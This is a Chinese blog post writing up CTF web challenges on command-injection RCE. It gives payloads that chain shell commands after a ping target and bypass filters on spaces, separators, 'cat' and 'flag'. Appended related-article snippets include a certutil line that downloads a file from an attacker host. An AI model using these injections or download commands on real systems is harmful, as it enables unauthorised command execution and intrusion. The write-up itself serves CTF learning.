CTF_WEB学习-------------RCE之命令注入

最新推荐文章于 2025-04-26 11:26:31 发布
最新推荐文章于 2025-04-26 11:26:31 发布
阅读量3.7k 收藏 33
点赞数 8
分类专栏: CTF笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_45616570/article/details/118739229
版权

CTF_WEB学习-------------RCE之命令注入

REC

什么是RCE?

​ 远程命令/代码执行漏洞,简称为RCE漏洞,可以直接向服务器后台远程注入操作系统的命令或者代码,从而拿到服务器后台的权限。RCE分为远程执行命令(执行ping命令)和远程代码执行eval。

RCE产生的原因?

​ 漏洞的起源是在开发的过程中带有输入-执行功能的系统时,由于输入过滤不严谨,导致的命令产生了注入。

RCE漏洞分类

  • 命令注入
  • 文件包含
  • eval执行

image-20210713153902947

命令注入

什么是命令注入?

​ 命令注入就是通过控制外部的参数达到执行系统命令的效果

RCE命令注入分类
  • 无过滤
  • 过滤cat
  • 过滤空格
  • 过滤目录分隔符
  • 过滤运算符
  • 综合过滤练习
无过滤
题目

image-20210713155423178

解题过程
  1. 首先执行ping命令,ping本机ip:127.0.0.1,再加上ls这个系统命令,连起来就是127.0.0.1;ls。image-20210713155449327
  2. 接着查看里面的文件,构造命令127.0.0.1;cat +文件名image-20210713155518007
  3. 右键查看前端源码,发现存在flagimage-20210713155539956
过滤cat

​ 过滤cat,那么我们应当首先想到什么命令可以和cat 拥有相同的效果。和cat具有相同效果的命令有:

  • more
  • less
  • head
  • tail
题目

​ 题目提示:过滤了cat命令之后,你还有什么方法能读到 Flag?image-20210713165540383

解题过程
  1. 执行命令127.0.0.1;ls,发现几个PHP文件image-20210713165730660
  2. 因为cat会被过滤,使用more命令去代替它,127.0.0.1; more flag_317491770120937.phpimage-20210713170029999
过滤空格

​ 过滤空格,我们首先想到CTF题目中什么可以替代空格,这样的话我们就可以成功的绕过空格被过滤的限制。CTF中常用的绕过过滤空格的方法有:

$IFS
$IFS$1
${IFS}
$IFS$9
<     比如cat<a.tct:表示cat a.txt
<>
{cat,flag.php}  //用逗号实现了空格功能,需要用{}括起来
%20
%09
题目

​ 题目提示:这次过滤了空格,你能绕过吗,我们就采取措施,想办法去绕过过滤。image-20210713171754496

解题过程
  1. 执行命令 127.0.0.1;ls,查看可以访问的文件,发现一个flag_12954450028809.php文件。image-20210713171955683
  2. 使用cat命令去查看这个文件中有什么,并且此时要绕过对空格的过滤,执行命令:127.0.0.1; cat${IFS}flag_12954450028809.php,拿到flag。image-20210713172515844
过滤目录分隔符

​ 题目提示:这次过滤了目录分割符 / ,你能读到 flag 目录下的 flag 文件吗

​ 本题的思路不是用什么东西去绕过目录分隔符店的过滤,而是这个题目是对文件夹里的目录里的PHP文件的读取,所以我们不能直接cat文件夹,我们应当使用的系统命令cd去查看文件夹下的文件,然后去cat文件夹下的PHP文件

题目

image-20210714102446572

解题过程
  1. 阅读源码发现过滤**/ \ //**,我们不能利用目录分割符,去访问文件。image-20210714102911995
  2. 我们使用cd 命令查看这个文件夹127.0.0.1;cd flag_is_here;lsimage-20210714103615025
  3. 接着我们去cat flag_18515776511094.php执行命令127.0.0.1;cd flag_is_here;cat flag_18515776511094.php,获取到flagimage-20210714103845351
过滤运算符

​ 这个题目说过滤几个运算符,但是不影响我们做题,和前面的几道题目的思路类似。

题目

​ 题目提示:过滤了几个运算符, 要怎么绕过呢

image-20210714110718220

解题过程
  1. 执行命令127.0.0.1;ls,查看可利用信息,发现一个PHP文件。image-20210714111106676
  2. 执行命令**127.0.0.1;cat flag_6086289321351.php,**拿到flagimage-20210714111402926
综合过滤练习

​ 题目对**|,&,;, ,/,cat,flag,ctfhub**这些进行了过滤,我们的目的就是对这些进行替换

用more替换cat
用%0a去替换;
空格用${IFS}替换
flag可以用正则替换f***
flag可以用TAB加*替换,不过要用url编码TAB,表示为%09加*

注意本题提交的payload都是在浏览器输入框中输入的,不然会被二次转义。

题目

​ 题目提示:同时过滤了前面几个小节的内容, 如何打出漂亮的组合拳呢?

解题过程

  1. 输入命令127.0.0.1%0als,使用%0a代替 ;image-20210714220849200

  2. 使用正则表达式代替flag,使用{IFS}代替空格,此处注意传cd到文件夹下以后,要使用ls将文件加下的文件列出来。最后输入命令127.0.0.1%0acd${IFS}f***_is_here
    ${IFS}%0alsimage-20210714221447353

  3. 输入命令ip=127.0.0.1%0acd${IFS}f***_is_here
    ${IFS}%0amore
    ${IFS}f***_5222980724357.php,获取到flag

image-20210714221719423

  1. 输入命令ip=127.0.0.1%0acd${IFS}f***_is_here
    ${IFS}%0amore{IFS} f***_5222980724357.php,获取到flag

image-20210714221746883

CTF】php里面的命令注入技巧
网络空间安全|人工智能|计算机科学
10-18 1206
CTF比赛和代码审计中经常使用的命令注入技巧
CTFHub-Web-RCE-命令注入
qq_54037445的博客
11-29 2686
1、常见的拼接符1、A;B 先执行A,再执行B2、A & B 简单的拼接3、A | B 显示B的执行结果4、A&&B A执行成功之后才会执行B5、A || B A执行失败之后才会执行B, 在特殊情况下可代替空格2、常见的命令1.type 显示文本文件内容type x:\1.txt //显示x盘下的1.txt文件内容。
RCE命令注入
m0_75178803的博客
06-18 652
a=certutil -urlcahce -split -f http://192.168.160.135(攻击机)/1.txt 2.php。certutil -urlcache -split -f http://192.168.160.135(攻击机)/1.txt 2.php。在靶机(192.168.31.187)下的1.php查看上传的攻击机(192.168.160.135)中的2.php文件。漏洞的起源是在开发的过程中带有输入-执行功能的系统时,由于输入过滤不严谨,导致的命令产生了注入
CTF 中的 rce
最新发布
yqya_的博客
04-26 1094
ctf 中对于 rce 的考察
CTF-web 第十三部分 命令注入
热门推荐
iamsongyu的博客
11-25 1万+
一 、基本原理 命令注入指的是,利用没有验证过的恶意命令或代码,对网站或服务器进行渗透攻击。 注入有很多种,并不仅仅只有SQL注入。比如: 命令注入(Command Injection) Eval 注入(Eval Injection) 客户端脚本攻击(Script Insertion) 跨网站脚本攻击(Cross Site Scripting, XSS) SQL 注入攻击(SQL ...
CTF-命令注入(代码执行漏洞)
su__xiaoyan的博客
01-20 2133
实验环境 攻击机:172.20.10.5 靶机:172.20.10.4 实验流程 端口扫描 端口详细信息探测 命令:nmap -T4 -A -v 靶机IP地址 发现网站下的robots.txt中包含几个敏感目录 web站点详细信息探测 web目录爆破 访问robots.txt,对其中的敏感目录进行查看 其中/nothing为404页面,但是和正常的4014页面不同 查看源代码,发现网站管理员在源代码中存储了常用的密码 其中/tmp和/uploads均为空目录 尝试探测改地址允许使用的请求方法,
CTFHUB-web-RCE
ookami6497的博客
12-03 1709
CTFHUB--RCE--文件包含
qq_75120258的博客
03-02 1087
有时候由于网站功能需求,会让前端用户选择要包含的文件,而开发人员又没有对要包含的文件进行安全考虑,就导致攻击者可以通过修改文件的位置来让后台执行任意文件,从而导致文件包含漏洞。当它与包含函数结合时,php://filter经常会被当作代码呗执行,所以我们通常会对他进行BASE64编码。file=php://filter/resource=/flag 得到flag。php:// — 访问各个输入/输出流(I/O streams)data://text/plain 任意代码执行。zlib:// — 压缩流。
ctf_show笔记篇(web入门---php特性)
whale_waves的博客
03-02 1531
原理:当md5函数加密数组时会报错NULL,当两a和b同时都是数组时,md5(a)===md5(b)等于NULL===NULL。如果b=0那么会自己去判断a是什么进制,例如a=0x开头则是18进制,0开头则是8进制,也可以直接设置b=10进制之类的。把数组的键值和键名当作变量名和变量值,例如a[b]=c那么extract(a[b]) b=c。把数组的键值和键名当作变量名和变量值,例如a[b]=c那么extract(a[b]) b=c。
ctf_show笔记篇(web入门---反序列化)
whale_waves的博客
03-19 2203
例如$a = 1 $b = 2, 这时让$b = &$a, 再给$a 重新赋个值 $a = 3, 这个时候$b就会一直跟着$a变化, $a是什么$b就是什么。利用php处理畸形的序列化的处理措施, 当php收到畸形的序列化时, 会因为对此序列化的不放心, 会第一时间处理掉它, 所以能直接让处理他的顺序排在了最前面。这时, 如果传入一个|O:5:"Class"类似于这样的序列化, php就会自动把|前面的当作键名用, 反而会反序列化|后的值。
RCE命令注入
m0_51589948的博客
06-27 410
RCE命令注入 什么是RCE 远程命令/代码执行漏洞,简称RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统,RCE分为远程执行命令执行ping和远程代码执行eval 什么是命令注入 命令注入就是能够通过控制外部参数可以达到执行系统命令的效果 命令注入产生的原因 服务器对一些函数参数未进行过滤或者过滤不严格,导致可以注入执行额外的命令 例如,&,&&,|,||连接符,调用的第三方组件存在代码执行漏洞,如php代码执行函数的eval()
CTF—HTTP命令注入
IT小学子的博客
05-04 544
主机:192.168.32.152   靶机:192.168.32.167 首先nmap,nikto -host,dirb 探测 robots.txt目录下 在/nothing目录中,查看源码发现pass 在secure目录下发现一个zip文件,下载下来,发现密码freedom即可打开 然后发现mp3文件其实是text文本,cat打开 发现一段文字还有个url,打开url,用户...
RCE(remote command/code execute)远程命令注入
guanrongl的专栏
10-04 668
RCE(remote command/code execute,远程命令执行)漏洞,一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口,比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上。如果设计者在完成该功能时,没有做严格的安全控制,则可能会导致攻击者通过该接口提交“意想不到”的命令,从而让后台进行执行,从而控制整个后台服务器;以PHP为例,这些命令执行函数可以执行系统命令。当我们可以控制这些函数的参数时,就能运行我们想运行的命令,从而进行攻击。
CTFWEB题——RCE
tomyyyyy
10-31 6936
CTFWEB题——RCE 目录CTFWEB题——RCE相关函数命令执行代码注入绕过方式空格命令分隔符关键字限制长度限制回显无字母、数字getshell异或取反自增实例相关函数 命令执行 system() #string system ( string $command [, int &$return_var ] ) #system()函数执行有回显,将执行结果输出到页面上 &lt...
rce(ctf)
m0_73452266的博客
03-03 1483
ctfrce的解题思路,和常用手段
CTF-WEB-RCE
m0_74317362的博客
07-24 469
会直接输出结果。
CTF RCE漏洞
nobugnomoney的博客
09-17 4698
RCE知识点: rce分为远程执行ping,和远程代码执行evel。 漏洞出现原因:未在输入口做输入处理。 涉及到ping命令:ping是windows,linux系统下的一个命令,ping也属于一个通信协议,是TCP/IP协议的一部分,利用ping命令可以检查网络是否连通,可以很好的帮助我们分析和判定网络故障。 PHP 执行系统外部命令 system() exec() passthru() PHP作为一种服务器端的脚本语言,象编写简单,或者是复杂的动态网页这样的任务,它完全能够胜任。但事情不总是如此,有时
CTF实验:web安全命令注入
floyd_art的博客
04-14 1147
信息探测 扫描主机服务信息以及服务版本 – nmap -sV 靶场IP地址 快速扫描主机全部信息 – nmap -T4 -A -v 靶场IP地址 探测目录信息 – nikto -host http://靶场IP地址:端口 – dirb http://靶场IP地址:端口 可利用信息 – robots.txt – nothing – secure – backup.zip 对于每一...
CTFHUB----web前置技能-rce
01-01
### CTFHUB Web 前置技能 RCE 挑战及解题思路 #### 远程命令执行简介 远程命令执行(Remote Command Execution, RCE),是指攻击者能够通过应用程序接口发送特定指令,在服务器端执行任意操作系统级别的命令。这种漏洞一旦被利用,可能导致整个系统的完全控制。 #### 发现潜在的RCE漏洞 当面对可能存在RCE漏洞的应用程序时,通常会寻找可以输入数据的地方,比如表单提交、URL参数等位置。如果这些地方的数据未经严格验证就直接用于构建并执行系统调用,则可能成为RCE攻击的目标[^1]。 #### 验证是否存在RCE漏洞 为了确认是否真的存在这样的安全风险,可以通过尝试注入一些简单的测试语句来观察响应情况。例如,在支持PHP环境的情况下,可以试着向目标页面传递如下payload: ```php <?php phpinfo(); ?> ``` 如果上述代码被执行并且返回了PHP配置信息,则说明确实存在未受保护的入口点允许外部传入的内容影响到内部逻辑处理流程。 #### 利用已知条件构造有效载荷 假设经过初步探测之后发现了某个变量可以直接参与到shell_exec()函数之中去,那么就可以精心设计一段能实现预期目的同时又不会引起怀疑的日志记录脚本作为最终的有效负载。这里给出一个简单例子用来获取当前目录下的文件列表: ```bash ls -al ``` 当然实际操作过程中还需要考虑更多因素,如编码方式转换、特殊字符转义等问题以确保成功绕过防护机制达到想要的效果。 #### 安全建议 对于开发者而言,预防此类问题的发生至关重要。应当遵循最小权限原则分配资源访问权;对所有来自客户端的信息都应做充分校验过滤后再参与后续运算过程;定期审查源码查找安全隐患及时修复补丁版本更新至最新状态等等措施均有助于减少遭受恶意侵害的可能性。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值